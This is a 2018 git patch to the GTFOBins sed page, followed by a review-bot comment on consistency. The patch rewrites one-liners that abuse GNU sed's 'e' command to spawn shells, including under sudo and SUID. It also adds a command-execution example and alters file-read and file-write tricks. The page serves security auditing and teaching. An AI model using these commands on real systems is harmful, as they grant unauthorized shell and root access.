From 2da69686ac2b1bfaa2d5fa1191a5882616be00c7 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Wed, 13 Jun 2018 16:00:47 +0200
Subject: [PATCH] Fix sed execute and file write, also enforce standards
---
 _gtfobins/sed.md | 18 +++++++++++-------
 1 file changed, 11 insertions(+), 7 deletions(-)
diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md
index dbeb315..c0f2f67 100644
--- a/_gtfobins/sed.md
+++ b/_gtfobins/sed.md
@@ -1,19 +1,23 @@
 ---
 functions:
 execute-interactive:
- - code: sed "e /bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'"
+ - description: GNU version only. Also, this requires `bash`.
+ code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
+ execute-non-interactive:
+ - description: GNU version only.
+ code: sed -n "1e id" /etc/hosts
 sudo-enabled:
- - code: sudo sed "e /bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'"
+ - description: GNU version only. Also, this requires `bash`.
+ code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
 suid-enabled:
- - code: |
- LFILE=file_to_read
- ./sed -e '' "$LFILE"
+ - description: GNU version only. Also, this requires `bash`.
+ code: ./sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
 file-read:
 - code: |
 LFILE=file_to_read
- sed -e '' "$LFILE"
+ sed '' "$LFILE"
 file-write:
 - code: |
 LFILE=file_to_write
- echo x | sed "s/x/data/;w $LFILE"
+ sed -n "1s/.*/data/w $LFILE" /etc/hosts
 ---
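Review bot: The new entries are inconsistent about how the shell is named: `execute-interactive` runs bare `bash` (a PATH lookup) while `sudo-enabled` and `suid-enabled` use `/bin/bash`, although all three carry the same "this requires `bash`" description; one form should be used throughout. Every rewritten command, including `file-write`, now reads `/etc/hosts` as a dummy input and only does anything if that file exists and has a first line, which no description states; I would add a sentence such as `The input file only needs to be readable and non-empty.` to each affected `description`. The `suid-enabled` section also loses its file-read example with nothing in the commit message explaining why, so a reader auditing SUID binaries no longer sees that exposure recorded on this page; it is worth confirming that removal is intended.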